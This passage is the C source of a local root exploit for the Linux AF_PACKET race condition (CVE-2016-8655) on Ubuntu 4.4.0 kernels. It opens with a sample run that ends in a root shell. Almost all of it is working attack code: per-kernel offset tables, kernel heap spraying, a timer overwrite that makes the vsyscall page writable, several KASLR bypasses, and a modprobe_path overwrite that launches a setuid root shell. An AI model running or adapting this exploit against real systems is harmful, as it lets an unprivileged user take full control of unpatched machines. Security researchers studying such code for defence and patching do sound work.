(x86_64) kernels 4.4.0 before 4.4.0-53.74.\r\nAll kernel offsets have been tested on Ubuntu / Linux Mint.\r\n\r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\nuser@ubuntu:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n\r\n\r\nstage 1 completed\r\nregistering new sysctl..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n\r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n\r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n\r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n\r\n11/2016\r\nby rebel\r\n---\r\nUpdated by <bcoles@gmail.com>\r\n- check number of CPU cores\r\n- KASLR bypasses\r\n- additional kernel targets\r\nhttps://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <pthread.h>\r\n#include <sched.h>\r\n#include <signal.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/syscall.h>\r\n#include <sys/sysinfo.h>\r\n#include <sys/utsname.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <netinet/if_ether.h>\r\n\r\n#define DEBUG\r\n\r\n#ifdef DEBUG\r\n# define dprintf printf\r\n#else\r\n# define dprintf\r\n#endif\r\n\r\n#define ENABLE_KASLR_BYPASS 1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = 0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions()\r\nint kernel = -1;\r\n\r\n// New sysctl path\r\nconst char *SYSCTL_NAME = \"hack\";\r\nconst char *SYSCTL_PATH = \"/proc/sys/hack\";\r\n\r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n\r\nstruct kernel_info {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n { \"4.4.0-21-generic #37~14.04.1-Ubuntu\", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },\r\n { \"4.4.0-22-generic #40~14.04.1-Ubuntu\", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },\r\n { \"4.4.0-24-generic #43~14.04.1-Ubuntu\", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },\r\n { \"4.4.0-28-generic #47~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },\r\n { \"4.4.0-31-generic #50~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },\r\n { \"4.4.0-34-generic #53~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },\r\n { \"4.4.0-36-generic #55~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },\r\n { \"4.4.0-38-generic #57~14.04.1-Ubuntu\", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },\r\n { \"4.4.0-42-generic #62~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274300, 0x06b880 },\r\n { \"4.4.0-45-generic #66~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274340, 0x06b880 },\r\n //{\"4.4.0-46-generic #67~14.04.1-Ubuntu\",0x0842f0,0xe4b100,0x274580,0x06b880},\r\n { \"4.4.0-47-generic #68~14.04.1-Ubuntu\", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },\r\n //{\"4.4.0-49-generic #70~14.04.1-Ubuntu\",0x084350,0xe4b100,0x274b10,0x06b880},\r\n { \"4.4.0-51-generic #72~14.04.1-Ubuntu\", 0x084350, 0xe4b100, 0x274750, 0x06b880 },\r\n\r\n { \"4.4.0-21-generic #37-Ubuntu\", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },\r\n { \"4.4.0-22-generic #40-Ubuntu\", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },\r\n { \"4.4.0-24-generic #43-Ubuntu\", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },\r\n { \"4.4.0-28-generic #47-Ubuntu\", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },\r\n { \"4.4.0-31-generic #50-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },\r\n { \"4.4.0-34-generic #53-Ubuntu\", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },\r\n { \"4.4.0-36-generic #55-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },\r\n { \"4.4.0-38-generic #57-Ubuntu\", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },\r\n { \"4.4.0-42-generic #62-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },\r\n { \"4.4.0-43-generic #63-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },\r\n { \"4.4.0-45-generic #66-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },\r\n //{\"4.4.0-46-generic #67-Ubuntu\",0x088040,0xe48f80,0x287800,0x06f320},\r\n { \"4.4.0-47-generic #68-Ubuntu\", 0x088040, 0xe48f80, 0x287800, 0x06f320 },\r\n //{\"4.4.0-49-generic #70-Ubuntu\",0x088090,0xe48f80,0x287d40,0x06f320},\r\n { \"4.4.0-51-generic #72-Ubuntu\", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},\r\n};\r\n\r\n#define VSYSCALL 0xffffffffff600000\r\n#define PROC_DOSTRING (KERNEL_BASE + kernels[kernel].proc_dostring)\r\n#define MODPROBE_PATH (KERNEL_BASE + kernels[kernel].modprobe_path)\r\n#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)\r\n#define SET_MEMORY_RW (KERNEL_BASE + kernels[kernel].set_memory_rw)\r\n\r\n#define KMALLOC_PAD 64\r\n\r\nint pad_fds[KMALLOC_PAD];\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n\r\n#define CONF_RING_FRAMES 1\r\n\r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n\r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while (barrier) {}\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n\r\n return NULL;\r\n}\r\n\r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n\r\n while (barrier) {}\r\n\r\n while (1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n y++;\r\n\r\n if (x != 0) break;\r\n\r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n if (x != 0) break;\r\n\r\n y++;\r\n }\r\n\r\n dprintf(\"[.] version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n\r\n return NULL;\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n\r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\", \"wtf\", exploitbuf, BUFSIZE - 24, -2);\r\n}\r\n\r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n for (x = 0; x < KMALLOC_PAD; x++)\r\n if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {\r\n dprintf(\"[-] pad_kmalloc() socket error\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n\r\n sigemptyset(&set);\r\n\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n dprintf(\"[.] new exploit attempt starting, jumping to %p, arg=%p\\n\", (void *)func, (void *)arg);\r\n\r\n pad_kmalloc();\r\n\r\n fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\r\n if (fd == -1) {\r\n dprintf(\"[-] target socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n pad_kmalloc();\r\n\r\n dprintf(\"[.] done, sockets allocated\\n\");\r\n\r\n val = TPACKET_V3;\r\n\r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n\r\n // try to set the timeout to 10 seconds\r\n // the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n\r\n sfd = fd;\r\n\r\n if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n dprintf(\"[-] Error creating thread\\n\");\r\n return 1;\r\n }\r\n\r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n\r\n usleep(200000);\r\n\r\n dprintf(\"[.] removing barrier and spraying...\\n\");\r\n\r\n memset(exploitbuf, '\\x00', BUFSIZE);\r\n\r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n\r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n\r\n barrier = 0;\r\n\r\n usleep(100000);\r\n\r\n while (!vers_switcher_done) usleep(100000);\r\n\r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n\r\n dprintf(\"[.] current packet version = %d\\n\",val);\r\n\r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n\r\n if (pbd == MAP_FAILED) {\r\n dprintf(\"[-] could not map pbd\\n\");\r\n exit(1);\r\n } else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n dprintf(\"[.] pbd->hdr.bh1.offset_to_first_pkt = %d\\n\", off);\r\n }\r\n\r\n\r\n if (val == TPACKET_V1 && off != 0) {\r\n dprintf(\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n } else {\r\n dprintf(\"[-] race not won\\n\");\r\n exit(2);\r\n }\r\n\r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n\r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n\r\n dprintf(\"\\n\");\r\n dprintf(\"[!] please wait up to a few minutes for timer to be executed.\\n\");\r\n dprintf(\"[!] if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n dprintf(\"\\n\");\r\n\r\n sleep(1);\r\n dprintf(\"[.] closing socket and verifying...\\n\");\r\n\r\n close(sfd);\r\n\r\n kmalloc();\r\n\r\n dprintf(\"[.] all messages sent\\n\");\r\n\r\n sleep(31337);\r\n exit(1);\r\n}\r\n\r\nint verification_result = 0;\r\n\r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n\r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n\r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n signal(SIGSEGV, catch_sigsegv);\r\n\r\n *vsyscall = 0xdeadbeef+x;\r\n\r\n if (*vsyscall == 0xdeadbeef+x) {\r\n dprintf(\"[~] vsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\nvoid verify_stage1(void)\r\n{\r\n pthread_t v_thread;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n\r\n pthread_join(v_thread, NULL);\r\n\r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not modify vsyscall\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid verify_stage2(void)\r\n{\r\n struct stat b;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n if (stat(SYSCTL_PATH, &b) == 0) {\r\n dprintf(\"[~] sysctl added!\\n\");\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not add sysctl\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n\r\nretry:\r\n\r\n pid = fork();\r\n\r\n if (pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n\r\n wait(&status);\r\n\r\n dprintf(\"\\n\");\r\n\r\n if (WEXITSTATUS(status) == 2) {\r\n dprintf(\"[.] retrying stage...\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n\r\n if (WEXITSTATUS(status) != 0) {\r\n dprintf(\"[-] something bad happened, aborting exploit attempt\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n kill(pid, 9);\r\n}\r\n\r\n\r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n\r\n dprintf(\"[.] making vsyscall page writable...\\n\\n\");\r\n\r\n exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);\r\n\r\n dprintf(\"[~] done, stage 1 completed\\n\");\r\n\r\n sleep(5);\r\n\r\n dprintf(\"[.] registering new sysctl...\\n\\n\");\r\n\r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n\r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n\r\n strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);\r\n memcpy((char *)(VSYSCALL+0xe00), \"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(PROC_DOSTRING);\r\n c->data = (void *)(MODPROBE_PATH);\r\n c->maxlen = 256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n\r\n exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);\r\n\r\n dprintf(\"[~] done, stage 2 completed\\n\");\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\nvoid check_procs() {\r\n int min_procs = 2;\r\n\r\n int nprocs = 0;\r\n nprocs = get_nprocs_conf();\r\n\r\n if (nprocs < min_procs) {\r\n dprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n dprintf(\"[.] system has %d processor cores\\n\", nprocs);\r\n}\r\n\r\nstruct utsname get_kernel_version() {\r\n struct utsname u;\r\n int rv = uname(&u);\r\n if (rv != 0) {\r\n dprintf(\"[-] uname())\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n return u;\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\nvoid detect_versions() {\r\n struct utsname u;\r\n char kernel_version[512];\r\n\r\n u = get_kernel_version();\r\n\r\n if (strstr(u.machine, \"64\") == NULL) {\r\n dprintf(\"[-] system is not using a 64-bit kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (strstr(u.version, \"-Ubuntu\") == NULL) {\r\n dprintf(\"[-] system is not using an Ubuntu kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n char *u_ver = strtok(u.version, \" \");\r\n snprintf(kernel_version, 512, \"%s %s\", u.release, u_ver);\r\n\r\n int i;\r\n for (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {\r\n dprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].kernel_version);\r\n kernel = i;\r\n return;\r\n }\r\n }\r\n\r\n dprintf(\"[-] kernel version not recognized\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nbool mmap_syslog(char** buffer, int* size) {\r\n *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\r\n return false;\r\n }\r\n\r\n *size = (*size / getpagesize() + 1) * getpagesize();\r\n *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\r\n return false;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) return 0;\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (end = start; substr[end] != '-'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) return 0;\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xffffffffff000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (start = 0; substr[start] != '-'; start++);\r\n for (end = start; substr[end] != '\\n'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xfffffffffff00000ul;\r\n r -= 0x1000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_syslog() {\r\n unsigned long addr = 0;\r\n char* syslog;\r\n int size;\r\n\r\n dprintf(\"[.] trying syslog...\\n\");\r\n\r\n if (!mmap_syslog(&syslog, &size))\r\n return 0;\r\n\r\n if (strstr(kernels[kernel].kernel_version, \"14.04.1\") != NULL)\r\n addr = get_kernel_addr_trusty(syslog, size);\r\n else\r\n addr = get_kernel_addr_xenial(syslog, size);\r\n\r\n if (!addr)\r\n dprintf(\"[-] kernel base not found in syslog\\n\");\r\n\r\n return addr;\r\n}\r\n\r\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_kallsyms() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n char* path = \"/proc/kallsyms\";\r\n\r\n dprintf(\"[.] trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_sysmap() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char path[512] = \"/boot/System.map-\";\r\n char version[32];\r\n\r\n struct utsname u;\r\n u = get_kernel_version();\r\n strcat(path, u.release);\r\n dprintf(\"[.] trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_mincore() {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n unsigned long iterations = 20000000;\r\n unsigned long addr = 0;\r\n\r\n dprintf(\"[.] trying mincore info leak...\\n\");\r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\r\n MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\r\n dprintf(\"[-] mmap()\\n\");\r\n return 0;\r\n }\r\n\r\n int i;\r\n for (i = 0; i <= iterations; i++) {\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf)) {\r\n dprintf(\"[-] mincore()\\n\");\r\n return 0;\r\n }\r\n\r\n int n;\r\n for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space */\r\n if (addr > 0xffffffff00000000) {\r\n addr &= 0xffffffffff000000ul;\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n return addr;\r\n }\r\n }\r\n }\r\n\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n\r\n dprintf(\"[-] kernel base not found in mincore info leak\\n\");\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr() {\r\n unsigned long addr = 0;\r\n\r\n addr = get_kernel_addr_kallsyms();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_sysmap();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_syslog();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_mincore();\r\n if (addr) return addr;\r\n\r\n dprintf(\"[-] KASLR bypass failed\\n\");\r\n exit(EXIT_FAILURE);\r\n\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n\r\n fd = open(SYSCTL_PATH, O_WRONLY);\r\n\r\n if(fd == -1) {\r\n dprintf(\"[-] could not open %s\\n\", SYSCTL_PATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(buf, '\\x00', 256);\r\n\r\n readlink(\"/proc/self/exe\", (char *)&buf, 256);\r\n\r\n write(fd, buf, strlen(buf)+1);\r\n\r\n socket(AF_INET, SOCK_STREAM, 132);\r\n\r\n if (stat(buf,&s) == 0 && s.st_uid == 0) {\r\n dprintf(\"[+] binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd, \"/sbin/modprobe\", 15);\r\n close(fd);\r\n execl(buf, buf, NULL);\r\n } else {\r\n dprintf(\"[-] could not create rootshell\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nvoid setup_sandbox() {\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWNET)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n char buf[512], *f;\r\n\r\n if (getuid() == 0 && geteuid() == 0) {\r\n chown(\"/proc/self/exe\", 0, 0);\r\n chmod(\"/proc/self/exe\", 06755);\r\n exit(0);\r\n }\r\n\r\n if (getuid() != 0 && geteuid() == 0) {\r\n setresuid(0, 0, 0);\r\n setresgid(0, 0, 0);\r\n execl(\"/bin/bash\", \"bash\", \"-p\", NULL);\r\n exit(0);\r\n }\r\n\r\n dprintf(\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n\r\n dprintf(\"[.] starting\\n\");\r\n\r\n dprintf(\"[.] checking 